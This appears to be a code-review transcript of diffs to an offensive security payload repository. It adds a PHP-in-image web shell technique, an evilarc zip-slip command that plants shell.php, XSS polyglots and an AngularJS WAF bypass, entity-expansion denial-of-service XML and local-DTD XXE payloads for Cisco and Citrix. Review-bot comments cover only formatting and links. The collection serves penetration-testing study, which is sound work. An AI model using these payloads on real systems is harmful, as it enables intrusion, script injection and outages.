- EICAR file to check the presence of an antivirus

### Picture upload with LFI
### Picture Compression

Valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
Create valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.

- Picture Metadata, hide the payload inside a comment tag in the metadata.
- Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()`.
- [JPG](https://virtualabs.fr/Nasty-bulletproof-Jpegs-l): use createBulletproofJPG.py
- [PNG](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createPNGwithPLTE.php
- [GIF](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createGIFwithGlobalColorTable.php


### Picture with custom metadata

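Review bot: the three new bullets name `createBulletproofJPG.py`, `createPNGwithPLTE.php` and `createGIFwithGlobalColorTable.php` as plain text and link only to the blog posts, although the scripts are added to this directory in the same change; link the file names so readers find them without searching. The rewritten first sentence also keeps the stray space in `following command :`; drop it.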

@ -185,7 +189,11 @@ When a ZIP/archive file is automatically decompressed after the upload
### Jetty RCE

Upload the XML file to `$JETTY_BASE/webapps/`
* [JettyShell.xml](https://raw.githubusercontent.com/Mike-n1/tips/main/JettyShell.xml)
* [JettyShell.xml - From Mikhail Klyuchnikov](https://raw.githubusercontent.com/Mike-n1/tips/main/JettyShell.xml)

## Labs

* [Portswigger Labs on File Uploads](https://portswigger.net/web-security/all-labs#file-upload-vulnerabilities)


## References

@ -198,4 +206,7 @@ Upload the XML file to `$JETTY_BASE/webapps/`
* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
* [Arbitrary File Upload Tricks In Java - pyn3rd](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload)
* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload)
* [Injection points in popular image formats - Daniel Kalinowski - Nov 8, 2019](https://blog.isec.pl/injection-points-in-popular-image-formats/)
* [A tip for getting RCE in Jetty apps with just one XML file! - Aug 4, 2022 - PT SWARM / @ptswarm](https://twitter.com/ptswarm/status/1555184661751648256/)
* [Jetty Features for Hacking Web Apps - September 15, 2022 - Mikhail Klyuchnikov](https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/)
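Review bot: the `File Upload - HackTricks` entry is removed and re-added with no visible difference, which usually means a whitespace or line-ending change; if the intent was to strip trailing whitespace that is fine, but verify the merge did not introduce CRLF endings into this file. The three new entries also use three different date formats (`Nov 8, 2019`, `Aug 4, 2022`, `September 15, 2022`); one format keeps the list consistent.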

@ -4,11 +4,11 @@

## Summary

- [Detection](#detection)
- [Tools](#tools)
* [Detection](#detection)
* [Tools](#tools)
* [Exploits](#exploits)
* [Basic Exploit](#basic-exploit)
- [Additional Notes](#additional-notes)
* [Additional Notes](#additional-notes)

## Detection


@ -16,12 +16,14 @@

## Tools

- evilarc [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc)
- [evilarc](https://github.com/ptoomey3/evilarc)
- [slipit](https://github.com/usdAG/slipit)

## Exploits

### Basic Exploit

Using evilarc:
```python
python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
```
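Review bot: the `Basic Exploit` block is fenced as a `python` block but contains a command line (`python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15`), so it will be highlighted as Python source; tag it `ps1`, the fence this repository uses for command lines, or `bash`. A short line saying what `-p` and `-d` control would also let readers adapt the example rather than copy it.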

@ -49,6 +49,9 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
<meta property="og:image" content="https://test"><script>alert(1)</script>">
```

## Labs

* [PortSwigger Labs for Web cache deception](https://portswigger.net/web-security/all-labs#web-cache-poisoning)

## References

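Review bot: the new Labs entry is titled `PortSwigger Labs for Web cache deception` but links to the `#web-cache-poisoning` anchor of the labs index; if the cache poisoning labs are what is meant, say so in the link text, otherwise point the anchor at the deception labs so the title and the target agree.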

@ -59,6 +59,10 @@ application uses a `Sec-WebSocket-Protocol` header in the handshake request,
you have to add this value as a 2nd parameter to the `WebSocket` function call
in order to add this header.

## Labs

* [PortSwigger Labs for Web Sockets](https://portswigger.net/web-security/all-labs#http-request-smuggling)

## References

- [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
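Review bot: the Labs link for Web Sockets points at the `#http-request-smuggling` anchor of the PortSwigger labs index, which is a different topic and looks copy-pasted from another README; point it at the WebSockets section of that page instead (its anchor follows the section title, so `#websockets`).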

@ -13,3 +13,4 @@ javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert(
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

@ -629,6 +629,11 @@ javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></st
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
```

Polyglot XSS - from [brutelogic](https://brutelogic.com.br/blog/building-xss-polyglots/)
```javascript
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
```

## Filter Bypass and exotic payloads

### Bypass case sensitive

@ -1222,6 +1227,10 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
```

## Labs

* [PortSwigger Labs for XSS](https://portswigger.net/web-security/all-labs#cross-site-scripting)

## References

- [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)

@ -175,6 +175,12 @@ AngularJS (without `'` single and `"` double quotes and `constructor` string)
{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
```

AngularJS bypass Waf [Imperva]

```javascript
{{x=['constr', 'uctor'];a=x.join('');b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'pr\\u{6f}mpt(d\\u{6f}cument.d\\u{6f}main)')()}}
```

### Blind XSS

1.0.1 - 1.1.5 && > 1.6.0 by Mario Heiderich (Cure53)
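Review bot: `AngularJS bypass Waf [Imperva]` gives neither the AngularJS version range the payload applies to nor where it comes from, while the neighbouring entries carry both (`1.0.1 - 1.1.5 && > 1.6.0 by Mario Heiderich (Cure53)`); add the version range and a source, and spell `WAF` in capitals. The payload it is built from (the `a.sub.call.call(...)` chain just above) is unattributed in the visible context too, so one shared source line would cover both.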

@ -20,6 +20,8 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
- [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks)
- [Exploiting XXE to perform a deny of service](#exploiting-xxe-to-perform-a-deny-of-service)
- [Billion Laugh Attack](#billion-laugh-attack)
- [Yaml attack](#yaml-attack)
- [Parameters Laugh attack](#parameters-laugh-attack)
- [Error Based XXE](#error-based-xxe)
- [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band)
- [Blind XXE](#blind-xxe)

@ -228,6 +230,20 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```

### Parameters Laugh attack

A variant of the Billion Laughs attack, using delayed interpretation of parameter entities, by Sebastian Pipping.

```xml
<!DOCTYPE r [
<!ENTITY % pe_1 "<!---->">
<!ENTITY % pe_2 "%pe_1;<!---->%pe_1;">
<!ENTITY % pe_3 "%pe_2;<!---->%pe_2;">
<!ENTITY % pe_4 "%pe_3;<!---->%pe_3;">
%pe_4;
]>
<r/>
```

## Error Based XXE

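Review bot: `## Error Based XXE` is introduced as a level-2 heading while the neighbouring `### Parameters Laugh attack` and the other technique sections are level 3, and the TOC entry `- [Error Based XXE](#error-based-xxe)` is added at the same list level as `Parameters Laugh attack`; pick one level so the heading hierarchy and the TOC nesting agree. The Parameters Laugh description could also link to Sebastian Pipping's write-up, as the other attacks in this file cite their source.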

@ -372,7 +388,18 @@ Assuming payloads such as the previous return a verbose error. You can start poi
]>
<root></root>
```

### Cisco WebEx
```
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd">
<!ENTITY % url.attribute.set '>Your DTD code<!ENTITY test "test"'>
%local_dtd;
```
### Citrix XenMobile Server
```
<!ENTITY % local_dtd SYSTEM "jar:file:///opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd">
<!ENTITY % Body '>Your DTD code<!ENTITY test "test"'>
%local_dtd;
```
[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md)


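Review bot: the two new fences under `### Cisco WebEx` and `### Citrix XenMobile Server` have no language tag, and the closing fence of the WebEx block is immediately followed by the Citrix heading with no blank line, which some Markdown renderers fold into the code block; tag both `xml` like the block above and separate them with blank lines. The `>Your DTD code<` placeholder should also say what it stands for (the entity declarations from the preceding error-based examples), since the surrounding text does not, and the Sharoglazov write-up these payloads come from is only cited in the references, so a link next to the heading would help.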

@ -591,11 +618,16 @@ we can convert the character encoding to `UTF-16` using [iconv](https://man7.org
```bash
cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml
```
UTF-7 encoding can be used as well to bypass UTF-8/UTF-16 rules.

## Labs

* [PortSwigger Labs for XXE](https://portswigger.net/web-security/all-labs#xml-external-entity-xxe-injection)

## References

* [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
* [XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
* [Detecting and exploiting XXE in SAML Interfaces](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) - 6. Nov. 2014 - Von Christian Mainka
* [[Gist] staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
* [[Gist] mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
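Review bot: `UTF-7 encoding can be used as well to bypass UTF-8/UTF-16 rules.` is appended directly after the closing fence with no blank line, and unlike the UTF-16 case above it comes with neither an example nor a reference; add the blank line and either the equivalent `iconv` invocation (`-t UTF-7`) or a link to where the technique is described, and note that the document's encoding declaration has to match for the parser to accept it.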

@ -616,3 +648,6 @@ cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml
* [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube)
* [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon
* [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK
* [XXE: How to become a Jedi](https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf) - Zeronights 2017 - Yaroslav Babin
* [Payloads for Cisco and Citrix - Arseniy Sharoglazov](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)


@ -11,7 +11,6 @@
- [OJ Reeves](https://www.youtube.com/channel/UCz2aqRQWMhJ4wcJq3XneqRg)
- [Hacksplained - A Beginner Friendly Guide to Hacking](https://www.youtube.com/c/hacksplained)
- [STÖK](https://www.youtube.com/c/STOKfredrik)
- [Defcon](https://www.youtube.com/user/DEFCONConference)
- [Hackersploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q)
- [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw)
- [Nahamsec](https://www.youtube.com/c/Nahamsec)

@ -26,4 +25,7 @@
- [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
- [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
- [The Conscience of a Hacker](https://www.youtube.com/watch?v=0tEnnvZbYek)
- [Defcon 2020 Talks](https://www.youtube.com/user/DEFCONConference/videos)
- [Defcon Conference](https://www.youtube.com/user/DEFCONConference/videos)
- [x33fcon Conference](https://www.youtube.com/c/x33fcon)
- [Hack In Paris](https://www.youtube.com/user/hackinparis)
- [LeHack / HZV](https://www.youtube.com/user/hzvprod)